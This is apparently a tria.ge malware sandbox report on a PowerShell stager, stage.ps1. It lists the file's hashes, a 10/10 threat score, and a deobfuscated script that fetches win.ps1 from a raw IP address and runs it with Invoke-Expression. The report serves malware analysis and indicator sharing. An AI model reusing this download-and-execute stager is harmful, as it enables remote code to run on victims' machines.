Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
General
-
Target
stage.ps1
-
Size
266B
-
MD5
b6ca7de565721033ed17a1add2e54556
-
SHA1
80016a0a1b30282a06cabd1dce18cec68f9b7e47
-
SHA256
fc5019eeaaa51981dca5cc8736cdae0c6af4b10764e697aff9feb2affe703c19
-
SHA512
3402e2a84358abaf4d90d8e165652b6fff19be5d90d5d631b4b070406d6c7df20fad5d7b914712f174833a879c971837d10bca7abe7ee14f6723c93d4a9f3f7b
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
1
$scripturl = "http://35.192.76.216/win.ps1"
2
$scriptbytes = invoke-webrequest -uri $scripturl -usebasicparsing -method get -maximumredirection 0
3
$scriptcontent = "scriptbytes.content"
4
invoke-expression -command $scriptcontent
5
URLs
exe.dropper
http://35.192.76.216/win.ps1
Signatures
Files
-
stage.ps1